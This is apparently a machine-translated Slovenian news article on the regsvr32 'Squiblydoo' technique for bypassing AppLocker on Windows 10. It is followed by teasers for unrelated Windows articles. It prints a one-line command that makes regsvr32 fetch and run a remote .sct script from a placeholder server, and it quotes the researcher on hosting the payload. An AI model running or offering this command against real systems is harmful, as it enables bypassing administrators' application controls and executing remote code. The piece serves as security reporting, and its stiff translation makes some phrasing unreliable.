Regsvr32 je mogoče uporabiti za obhod applockerja v operacijskem sistemu Windows 10
Video: КАК ЗАРЕГИСТРИРОВАТЬ dll библиотеку в windows 2024
Raziskovalec iz Kolorada, ki se imenuje Casey Smith, je ugotovil, da je Regsvr32 mogoče uporabiti za obhod AppLockerja v sistemu Windows 10 in to je velika težava za uporabnike računalnikov, zlasti tiste v poslovnem okolju.
AppLocker je bil prvič predstavljen v sistemih Windows 7 in Windows Server 2008 R2. Zasnovan je tako, da lahko skrbniki določijo, katera skupina ali uporabniki lahko izkoristijo nekatere ali vse aplikacije na podlagi edinstvene identitete datotek. Če ste oseba, ki ponavadi uporablja AppLocker, potem mora biti splošno znano, da se lahko uporablja za ustvarjanje določenih pravil, ki omogočajo aplikacijam, da jih zaženejo ali ustavijo v svojih skladbah.
Za tiste, ki se morda ne zavedajo, se Regvr32 lahko uporablja za registracijo in odjavljanje DLL-jev. To ni orodje z enim klikom, saj gre za pripomoček ukazne vrstice, zato bi morali le napredni računalniški uporabniki iskati prednosti tega, kar lahko ponudi.
Zavedamo se, da z uporabo te tehnike ne spremeni registra računalniškega sistema, zaradi česar bodo skrbniki težko vedeli, ali so bile izvedene kakršne koli spremembe.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"Neverjetno pri tem je, da se regsvr32 že zaveda, da uporablja proxy, uporablja TLS, sledi preusmeritve itd … In … Uganili ste podpisano, privzeto MS binarno datoteko. Torej, vse, kar morate storiti, je gostovati datoteko your.sct na lokaciji, ki jo nadzorujete, "je zapisal Smith.
Zgornja tehnika ne zahteva upravnih pravic in ne spreminja registra. Poleg tega je mogoče skripte poklicati prek HTTP ali HTTPS. Trenutno Microsoft še ni izdal popravka za to majhno težavo, zato je edina možnost na tem mestu blokiranje Regsvr32 prek požarnega zidu Windows.
Zanimivo je, da se programski gigant še ni odzval na to varnostno težavo, s katero se sooča svoj operacijski sistem. Zdaj, ko je zunaj na prostem, pričakujemo, da bomo od podjetja slišali nekaj skupaj s pogovori o prihodnjem popravku.
Uporabniki ne morejo uporabiti izbrane barve na opravilni vrstici v operacijskem sistemu Windows 10 v1903
Številni uporabniki sistema Windows 10, ki so pred kratkim nadgradili svoje sisteme na sistem Windows 10 različice 1903, so sporočili, da ne morejo uporabiti svoje izbrane barve na opravilni vrstici.
Kopirne paste ni mogoče uporabiti v sistemu Windows 10 [celotni vodnik]
Številni uporabniki sistema Windows so poročali, da na svojem osebnem računalniku ne morejo uporabljati funkcije kopiranja. To je velika težava, vendar obstaja način, kako jo odpraviti v sistemih Windows 10, 8.1 in 7.
Izkoriščanje podvigov Applockerja, ki ga je mogoče popraviti z naslednjo večjo različico sistema Windows
AppLocker je funkcija v sistemih Windows OS in Windows Server, ki omogoča skrbnikom nadzor nad tem, kateri uporabniki lahko zaženejo določene aplikacije. Orodje uporablja edinstvene identitete datotek in omogoča skrbnikom, da ustvarijo pravila za dovoljenje ali blokiranje aplikacij. AppLocker omogoča skrbnikom, da nadzorujejo naslednje vrste aplikacij: izvršljive datoteke (.exe in .com), skripte (.js, .ps1, .vbs, .cmd,…